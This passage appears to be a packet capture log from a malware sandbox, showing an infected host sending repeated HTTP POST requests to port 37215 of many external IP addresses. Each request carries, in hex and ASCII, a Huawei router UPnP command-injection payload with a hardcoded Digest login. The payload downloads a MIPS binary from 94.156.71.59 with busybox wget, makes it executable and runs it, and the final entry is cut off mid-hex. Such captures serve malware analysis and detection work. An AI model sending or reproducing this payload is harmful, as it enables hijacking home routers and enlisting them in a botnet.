                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1036192.168.2.1343252156.44.242.22137215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.555468082 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1037192.168.2.1336402156.38.237.18137215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.557677984 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1038192.168.2.134757041.183.239.6837215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.560830116 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1039192.168.2.1338102197.25.228.25137215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.563136101 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1040192.168.2.134738841.216.214.937215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.565102100 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1041192.168.2.1360732197.231.191.14937215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.567475080 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1042192.168.2.135554841.173.218.1737215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.569979906 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1043192.168.2.1338786156.147.224.18337215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.571863890 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1044192.168.2.1356400197.15.119.10237215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.573983908 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1045192.168.2.133303841.97.183.6137215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.577352047 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 